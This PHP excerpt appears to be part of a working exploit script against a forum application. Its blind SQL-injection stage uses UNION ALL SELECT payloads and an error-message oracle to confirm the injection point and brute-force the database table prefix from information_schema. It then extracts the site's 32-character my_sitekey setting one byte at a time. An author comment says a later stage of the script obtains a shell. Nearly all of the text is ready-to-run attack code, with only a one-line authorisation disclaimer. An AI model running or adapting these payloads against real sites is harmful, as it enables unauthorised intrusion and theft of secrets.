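// ---------------------------------------------------------------------------
// Boolean-based blind SQL-injection stage: recover the table prefix and the
// 32-character `my_sitekey` setting from `{prefix}common_setting`.
//
// Names this stage relies on that are defined earlier in the file (not in
// this excerpt):
//   - send()  : sends the request with the current $tmp_expstr injected and
//               returns the response body as a string         -- TODO confirm
//   - $hash   : list of byte values tried for each sitekey character
//               (presumably the same 0-9a-z_ set as $hash2 below) -- TODO confirm
//
// Oracle: a request whose injected predicate is TRUE yields a response that
// contains the text "SQL syntax"; a FALSE predicate does not. Every LENGTH()
// and MID() probe below is decided by that one substring test, so a proxy,
// WAF or custom error page that rewrites MySQL's error text breaks the
// extraction silently (every probe reads as FALSE).
//
// Only run this against a system you are authorised to test.
// ---------------------------------------------------------------------------

// Step 0: confirm the injection point surfaces a MySQL error at all.
$tmp_expstr = "'";
$res = send();
// `===`, not `==`: strpos() returns 0 when the needle sits at offset 0, and
// 0 == false is true, which would abort on a positive result.
if (strpos($res, 'SQL syntax') === false) {
    var_dump($res);
    die('Oooops.I can NOT hack it.');
}

// Step 1: try to read the table prefix straight out of the leaked query text.
// Default to '' so the probe below still forms a valid table name (and no
// undefined-variable notice) when nothing matched.
$pre = '';
if (preg_match('/FROM\s([a-zA-Z_]+)forum_order/', $res, $match) && $match[1] !== '') {
    $pre = $match[1];
}

// Step 2: check that `{$pre}common_setting` exists. If MySQL answers
// "doesn't exist", the guessed prefix is wrong and has to be brute-forced.
$tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting WHERE ''='";
$res = send();
if (strpos($res, "doesn't exist") !== false) {
    echo "Table_pre is WRONG!\nReady to Crack It.Please Waiting..\n";

    // Candidate prefix bytes: '0'-'9', 'a'-'z', '_' (ints, so in_array() can be strict).
    $hash2 = array_merge(range(48, 57), range(97, 122), array(95));

    // 2a: find the prefix length (1..19) by comparing LENGTH() of the real
    //     table name with the literal 'forum_post_tableid' stripped off.
    for ($i = 1; $i < 20; $i++) {
        $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns WHERE table_schema=database() AND table_name LIKE '%forum_post_tableid%' AND LENGTH(REPLACE(table_name,'forum_post_tableid',''))=$i AND ''='";
        $res = send();
        if (strpos($res, 'SQL syntax') === false) {
            continue;
        }

        // 2b: recover the prefix one character at a time.
        $pre = '';
        for ($j = 1; $j <= $i; $j++) {
            for ($k = 0; $k <= 255; $k++) {
                if (!in_array($k, $hash2, true)) {
                    continue;
                }
                // Always emit two hex digits (0x0a rather than 0xa); MySQL
                // reads both the same way, but the padded form is unambiguous.
                $char = sprintf('%02x', $k);
                $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns WHERE table_schema=database() AND table_name LIKE '%forum_post_tableid%' AND MID(REPLACE(table_name,'forum_post_tableid',''),$j,1)=0x{$char} AND ''='";
                $res = send();
                if (strpos($res, 'SQL syntax') !== false) {
                    echo chr($k);
                    $pre .= chr($k);
                    break;
                }
            }
        }

        // A position where no candidate matched leaves $pre shorter than the
        // detected length. Treat that as a failure rather than reporting a
        // prefix with silently dropped characters as "cracked".
        if (strlen($pre) === $i) {
            echo "\nCracked...Table_Pre:" . $pre . "\n";
            break;
        }
        die('GET Table_pre Failed..');
    }
}

// Step 3: extract my_sitekey (32 chars) from common_setting, one byte at a time.
// 0x6D795F736974656B6579 is the hex encoding of the literal 'my_sitekey'.
echo "Please Waiting....\n";
$sitekey = '';
for ($i = 1; $i <= 32; $i++) {
    for ($k = 0; $k <= 255; $k++) {
        // Non-strict on purpose: $hash is defined outside this excerpt and its
        // element type (int vs. numeric string) is not visible here.
        if (!in_array($k, $hash)) {
            continue;
        }
        $char = sprintf('%02x', $k);
        $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting WHERE skey=0x6D795F736974656B6579 AND MID(svalue,{$i},1)=0x{$char} AND ''='";
        $res = send();
        if (strpos($res, 'SQL syntax') !== false) {
            echo chr($k);
            $sitekey .= chr($k);
            break;
        }
    }
}

/* Author note (translated): by alibaba -- modified and added some code; a
   later stage of the script (not in this excerpt) is said to obtain a shell
   whose one-line password is "cmd". Not verifiable from the code shown here. */
// A key shorter than 32 characters means at least one position matched no
// candidate byte (or the oracle misfired); do not trust a partial value.
if (strlen($sitekey) != 32) {
    echo "\nmy_sitekey not found. try blank my_sitekey\n";
} else {
    echo "\nmy_sitekey:{$sitekey}\n";
}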